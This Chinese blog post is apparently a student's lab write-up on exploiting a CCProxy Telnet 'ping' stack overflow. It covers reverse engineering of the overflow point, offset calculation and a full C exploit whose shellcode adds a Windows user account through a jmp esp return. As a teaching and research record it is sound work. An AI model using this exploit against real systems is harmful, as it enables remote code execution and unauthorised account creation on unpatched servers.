CCProxy漏洞利用

于 2024-07-03 15:16:39 发布
阅读量470 收藏 7
点赞数 4
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67181251/article/details/140153099
版权

CCProxy栈溢出漏洞

一. 漏洞发现

CCProxy是一款代理服务器软件,不仅支持常见的HTTP和SOCKETS代理,而且支持FTP和Telnet协议。我们这次的漏洞就是在Telnet服务当中的。

首先,使用ping指令进行大量输入,判断是否会出现栈溢出的情况,如果出现说明存在栈溢出的漏洞,并且可以进行利用。

使用kali通过telnet服务进行访问,ping指令后跟大量的重复字符。

image

image

报错并且显示地址为0x61616161,说明确实存在缓冲区溢出漏洞,并且可以进行利用。

二. 漏洞点探测

在发现了漏洞之后,按照实验指导书的方法是通过非重复字符串定位的方法进行判断溢出点和返回指令之间的相对距离来制定shellcode的格式。实验指导书上已说明的非常详细了,这里我采用逆向调试分析的方法查找漏洞溢出点和有关函数调用链。

1. 字符串搜索

首先根据提示字符信息,搜索和输入的ping指令有关的代码。

image

image

可以看到当发送的主机名无法识别时会接收到"Host not found"的提示字符串,在IDA当中进行查找定位到地址00430524处,这里调用了sprintf函数。这里其实就是溢出点,但是因为我对sprintf函数不熟悉,误以为它是打印有关字符串,错失了发现漏洞溢出点的机会,后续采用了其他方法才重新定位到该函数。

2. 函数溯源分析

分析打印字符串的函数sub_4304a0,发现hostname在这个函数当中不是以局部变量的形式进行存储,而是一个参数。

image

所以需要使用函数调用回溯,查看实际存储该数值所在的函数栈帧,按照惯例,应该是在该函数当中发生了栈溢出,覆盖了函数返回地址。

使用IDA进行函数调用回溯,发现调用链为sub_417260调用sub_426c10于0x0041744c,sub_426c10调用sub_4304a0于0x00426c30。sub_417260就是存放ping参数的函数,按照惯例,在这里应该就是发生栈溢出的地方,但是实际上该函数没有按照惯例构建栈帧。

image

这里分配了一个特别特别大的空间,并且最后在函数返回的时候也是需要覆盖一个特别大的空间。

image

在该函数流程当中也不存在其他可以修改程序执行流程的地方,明显和实验指导书上所描述的内容不符。逆向寻找陷入的困极当中。

3. 内存访问断点分析

重新思考,既然不是在这个初始函数当中出现问题,那么应该是在其他函数当中出现了调用该数据然后发生栈溢出的情况,可以在该地址空间下一个内存访问断点,当调用该数据时就进行查看,是不是我们想要的可能造成问题的函数,比如scanf,strcpy,strcact,memcpy函数等。

image

经过一段漫长的在dll函数当中的历程,终于找到了一处地方,这里将参数和"Host name not found"拼接了起来,放到另一个地址当中。地址为0x00430524:

image

惊讶的发现这里就是我们其实查找字符串对应的函数,使用IDA分析为一个名为sprintf的函数,但是这里不是使用dll导出函数,而是自己实现的一个函数。

image

image

但是功能是一致的。

查找有关资料,sprintf函数的功能是将一个字符串以特定格式复制到另一个地址处。

image

也就是在这个地方覆盖了返回地址,返回地址为:0x0043071e

image

在栈当中的存放返回地址的位置为:012d66f0

image

存放溢出点数组的其实地址为:012d62ec

image

但是需要注意的是前16个字节是确定的,实际shellcode的注入地址应该为012d62fc。

image

偏移量为:1012字节。

三. 编写exp

使用jmp esp跳转到shellcode执行代码处执行相应功能,所以我们将shellcode的执行代码放在跳转指令的后面,这样执行的时候就可以直接跳转到相应位置执行shellcode。

但是注意这里是retn c,也就是说应该加上16个字节。

正常来说编写的exp格式应该为:

[填充数据 1012字节] + [shellcode执行地址(这里是jmp esp的地址) 4字节] + [填充数据 12个字节][shellcode]

但是实际在分析过程当中发现这样会出现问题,在栈当中的数据不是我发送的exp内容,出现了顺序错误。如图:

image

但是实际上栈当中的数据为:

image

也就是说在溢出函数栈当中的存放的根本不是我们所发送的数据,而是存在变化。

分析该函数我们发现,这里是通过参数进行传递的,所以我们要去将ping的参数作为局部变量的函数进行分析,这个函数上面已经提到了是sub_417260。定位到该函数进行静态分析,经过分析发现了突破点,在调用下一个函数前先进行了一次复制操作,而复制的内容就是我们的name(ping指令的参数)。

image

动态分析:

在00417428,0041744c处下断点,分析指令执行情况

image

image

正常来说,这样是没有问题的,但是观察发现:

image

我们的shellcode不存在了,取而代之的是a的填充字符。这是因为name和str之间的相对偏移量为1024,而复制是通过逐字节依次进行复制的。所以当复制的内容超过1024字节之后,会从012d7b44也就是name的起始地址继续进行复制,我们后面的内容也就变成了name的起始地址的内容。

所以我们创建的exp格式需要重新构建:

在栈溢出函数为:1012字节的填充+4字节的jmp esp地址+12字节的填充+shellcode。

但是实际上发送的exp当中只有前1024字节为实际发送的,后续的内容为前1024字节的重复。

也就是说1012+4+8为实际发送的内容,后续应该是前1024的重复,即4(12-8)字节的填充,再加上shellcode的内容。在前1024字节内容当中前4个字节是填充,后续是shellcode,接下来到1012字节都是填充数据,然后是4字节的jmp esp地址,后续是填充字符。

实际exp格式为:

[填充数据 4字节] + [shellcode 假设为x字节] + [填充数据 1012-4-x字节] + [jmp esp地址 4字节] + [ 填充数据]

同时这里限定了我们的shellcode不能超过1008个字节。

重新编写exp:

image

这串shellcode用于执行创建账号指令,成功执行:

image

image

创建了新账号。

动态调试分析:

image

image

image

exp:

#include <stdio.h>
#include <winsock2.h>
#include <MSWSock.h>
#include <Windows.h>
#include<iostream>
using namespace std;
#pragma comment(lib, "ws2_32")

#define WIN32_LEAN_AND_MEAN
#define MAX_LEN 2000

unsigned char shell[] = 
"\x55\x8b\xec\x33\xff\x57\x83\xec"
"\x0c\xc6\x45\xf0\x6e\xc6\x45\xf1 "
"\x65\xc6\x45\xf2\x74\xc6\x45\xf3 "
"\x20\xc6\x45\xf4\x75\xc6\x45\xf5 "
"\x73\xc6\x45\xf6\x65\xc6\x45\xf7 "
"\x72\xc6\x45\xf8\x20\xc6\x45\xf9 "
"\x61\xc6\x45\xfa\x20\xc6\x45\xfb "
"\x2f\xc6\x45\xfc\x61\xc6\x45\xfd "
"\x64\xc6\x45\xfe\x64\x8d\x45\xf0 "
"\x50\xb8\xc7\x93\xbf\x77\xff\xd0 ";

int main(int argc, char* argv[])
{
	WSADATA ws; 
	int ret = WSAStartup(MAKEWORD(2, 2), &ws);
	struct sockaddr_in sa;
	sa.sin_family = AF_INET;
	sa.sin_port = htons(23);
	sa.sin_addr.s_addr = inet_addr("192.168.182.129");
	char buf[MAX_LEN];
	char buf1[1024];
	buf[0] = 'p'; buf[1] = 'i'; buf[2] = 'n'; buf[3] = 'g'; buf[4] = ' ';
	int l = strlen((const char*)shell);
//1. 填充数据 4字节
	buf[5] = buf[6] = buf[7] = buf[8] = 'a';
//2. shellcode x字节
	for (int j = 9; j < 9 + l; j++) 
	{
		buf[j] = shell[j - 9];
	}
//3. 填充数据 1012-4-x字节
	for (int i = 9 + l; i < 1012 + 5; i++)
		buf[i] = 'a';
//4. jmp esp地址 4字节
	buf[1017] = 0x12;
	buf[1018] = 0x45;
	buf[1019] = 0xFA;
	buf[1020] = 0x7F;
//5. 填充数据
	int i = 0;
	for (i = 1021; i < 1998; i++)
		buf[i] = 'a';
	buf[1998] = '\r'; buf[1999] = '\n';
	SOCKET sc = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);  //连接到服务器
	ret = connect(sc, (const sockaddr*)&sa, sizeof(sa));
	if (ret == 0)
	{
		cout << "连接成功" << endl;
	}
	else
	{
		cout << "连接失败" << endl;
	}
	//接收服务器端的回答
	recv(sc, buf1, 1024, 0);
	// 发送攻击数据
	ret = send(sc, buf, 2000, 0);
	closesocket(sc);
	WSACleanup();
	return 0;
}

ONE_ZJ
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CCProxy远程溢出漏洞分析
03-04
CCProxy是一个国产的支持HTTP、FTP、Gopher、SOCKS4/5、Telnet、Secure(HTTPS)、News(NNTP)、 RTSP、MMS等代理协议的代理服务器软件。因为其简单易用、界面友好,非常适合在对流量要求不高的网络环境中使用,所以在国内有很多初级的网管喜欢用这个软件。笔者在测试发现CCProxy 6.0版本存在多处缓冲区溢出漏洞,可以导致攻击者远程执行任意代码。
缓冲区溢出攻击
11-21
缓冲区溢出攻击是一种常见的网络安全威胁,它利用软件设计中的缺陷,尤其是与内存管理相关的漏洞,来破坏程序的正常运行,甚至获取对系统的非法控制。在本例中,我们将聚焦于Windows XP平台上的CCproxy服务,该服务...
CCProxy使用教程归纳.pdf
02-15
CCProxy使用教程归纳.pdf
CCPROXY漏洞利用
panfengblog
11-02 2098
CCPROXY漏洞利用 CCProxy是一款非常流行的下载量最大的的国产代理服务器软件,其CCProxy 6.2版本存在一个栈溢出漏洞,可以通过此漏洞进行shellcode攻击,以下是学习过程的一个小记录吧 : ) 1.找到并定位溢出点 使用ping命令加一个超长的字符串加一个主机名,代理端会返回Host not found。 当输入的字符串足够长时(比如2000个a),软件就会溢出奔溃,通过二分法尝试,发现ping后最多接1009个字符,第1010字符开始溢出,并且前四字节无用,如下图,当输入
利用CCPROXY溢出漏洞实现shellcode攻击
m0_46161993的博客
01-20 3425
寻找溢出点 打开CCPROXY后利用CMD控制台使用telnet命令连接主机127.0.0.1;使用ping命令寻找溢出点,观察到当ping后字符串长度达到1011时不产生溢出,而在长度达到1012时产生溢出,如下图: 确定EIP并修改为JMP ESP值 通过OD的“查找”“所有参考文本字串”进入字符串查找界面。点击右键“查找文本”后输入需要查找的字符串信息“Host not found”进行查找,如下图: 按下Enter后进入“Host not found”所在语句,并在此处设置断点。关闭代理,重新
利用CCproxy漏洞实现免费上网
qionghaizi的专栏
04-30 1321
最近网络太乱啦,都不不怎么说,艾!不过最近漏洞出来的也不少,就光光MS都出来一大堆,呵呵,就连一个代理的小小软件都会有漏洞,呵呵!有漏洞就好,大家可以玩玩嘛!刚刚出来了个isno大哥发现的Ccproxy漏洞,goldsun写出来的软件Ccpxdown.exe的软件,有的玩,呵呵,不过今天我要写的不是这个,是我自己发现的一些东西,其实没什么技术性!大家都知道ccproxy这个小软件吧!这个软件在我们
CVE漏洞攻击——ccproxy溢出
qq_43840665的博客
04-17 4490
CCProxy6.2溢出漏洞 虚拟机:VirtualBox 6.1.30 操作系统:WindowsXP SP2 主机OS:Microsoft Windows10 CVE编号:CVE-2004-2685 安装共享文件夹 按照下面箭头指向程序,然后再虚拟机设置中自动挂载一个主机的共享文件夹 2. 关闭winxp的DEP 使系统显示C:\boot.ini 修改DEP选项 查询虚拟机IP并连接ccproxy 命令提示符中输入ipconfig可以获得ip地址,或者使用127.0.0.1
我是如何发现CCProxy远程溢出漏洞的整理.pdf
02-05
"CCProxy远程溢出漏洞分析" CCProxy是一个国产的支持HTTP、FTP、Gopher、SOCKS4/5、Telnet、Secure(HTTPS)、News(NNTP)、RTSP、MMS等代理协议的代理服务器软件。由于其简单易用、界面友好,非常适合在对流量要求不...
Q版缓冲区溢出教程
10-31
Q版缓冲区溢出教程 目录 写在前面 2 目录 4 前言 6 作者简介 6 主要角色简介 6 阅读指南 6 ...7.1 CCProxy 漏洞的分析 308 7.2 黑盒法探测漏洞和Python脚本 319 7.3 白盒法和IDA分析漏洞 333 尾声 347
CCproxy缓冲区溢出攻击,对栈溢出的学习和利用
weixin_69815073的博客
04-07 2155
CCproxy漏洞利用学习
网络安全实验:CCProxy缓冲区溢出攻击
程哥哥的一亩三分地
04-17 6620
CCProxy缓冲区溢出实验 一.实验环境说明 溢出对象:CCProxy(一款代理服务器软件,支持FTP和Telnet) 调试工具:CDB、WinDbg、OllyDBG、IDA Pro etc 实验环境:VMware Workstation Pro、windows xp sp3(关闭dep)、python3、ActivePerl Windows XP SP3关闭DEP的方法:编辑C:\boot.ini文件,将/noexecute=optin 改为 /execute,重启系统 二.测试CCProxy是否存在漏
我是如何发现CCProxy远程溢出漏洞的
09-26 1530
CCProxy是一个国产的支持HTTP、FTP、Gopher、SOCKS4/5、Telnet、Secure(HTTPS)、News(NNTP)、 RTSP、MMS等代理协议的代理服务器软件。因为其简单易用、界面友好,非常适合在对流量要求不高的网络环境中使用,所以在国内有很多初级的网管喜欢用 这个软件,有时候我在公司上网也要用它做代理。前些日子我测试发现CCProxy 6.0版本存在多处缓冲区溢出漏
逆向分析如何发现CCProxy远程溢出漏洞
weixin_33698043的博客
05-11 350
2019独角兽企业重金招聘Python工程师标准>>> ...
CCProxy是个好东西
热门推荐
sinadrew的博客
05-30 11万+
我在之前的博客里提到了用Teamviewer + CCProxy做内网穿透,当时只是简单提了一下,因为发现这种方式网速比较慢。今天又用到了它,虽然慢点,但是总比没的用好,哈哈哈。不得不感叹CCProxy是个好东西,小巧灵活,好多次用学校的ip下论文都靠它的,设置也比较简单。代理上网本质上和代购一样,只要内网机器能访问的网络,你的机器通过代理连上它,就都能远程访问。A. 可以直接使用CCProxy开...
CCProxy代理
超哥的专栏
04-27 2102
只要局域网内有一台机器能够上网,其他机器就可以通过这台机器上安装的CCProxy来代理共享上网,最大程度的减少了硬件费用和上网费用。只需要在服务器上CCProxy代理服务器软件里进行帐号设置,就可以方便的管理客户端代理上网的权限 帐号设置 设置需要代理的帐号 新建帐号 点击问号,可以自动获取本机地址 ie代理设置 连接测试 启动监控 代理连接成功 ...
CCProxy的使用
Seven_cm
06-21 3444
1 打开ccproxy 点击account,增加需要代理的用户。 2 如下图 点击new添加新代理规则 3 如下图 红色框填入代理目标的IP地址,点击OK 4 查看运行ccproxy代理的IP地址: ipconfig 5 对被代理的目标机器,填写代理服务器信息(我的是移动端) 至此,ccproxy的使用介绍结束。如有错漏,请指出。
CCProxy使用指南
Qbit编程学习笔记
05-16 6137
目标是让一个电脑上安装CCProxy,然后其他电脑也是使用这台电脑上VPN 下载&安装 http://update.youngzsoft.com/ccproxy/update/ccproxysetup.exe 服务端配置 进入设置页面 记住上面的端口,一般HTTP和HTTPS用的比较多,都是808端口 点击上面的高级按钮,选择网络,确保配置正确 git配置 git config --global https.proxy http://vpn.kamputer.online:808 git co
ccproxy使用教程
最新发布
05-09
CCProxy是一款代理服务器软件,它可以实现局域网内多台计算机共享一个Internet连接。具体使用教程如下: 1. 下载并安装CCProxy软件,然后运行软件。 2. 在CCProxy主界面中,点击左侧的“用户管理”,设置登录用户名和密码。这个账号密码将在后续使用代理时用到。 3. 点击左侧的“代理设置”,在“代理设置”窗口中,勾选“启用代理服务器”选项,并在“HTTP代理”和“SOCKS代理”中填写代理端口号,一般默认为808。 4. 点击左侧的“网络连接”,在“网络连接”窗口中,选择需要共享的网络连接,例如选择“本地连接”,然后点击“属性”按钮,在弹出的“本地连接属性”窗口中,点击“共享”选项卡,勾选“允许其他网络用户通过此计算机的Internet连接来连接”,并选择刚刚创建的CCProxy账号。 5. 在需要使用代理的计算机中,打开浏览器,进入浏览器设置页面,将HTTP和SOCKS代理地址都设置为共享CCProxy的计算机IP地址和端口号即可。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值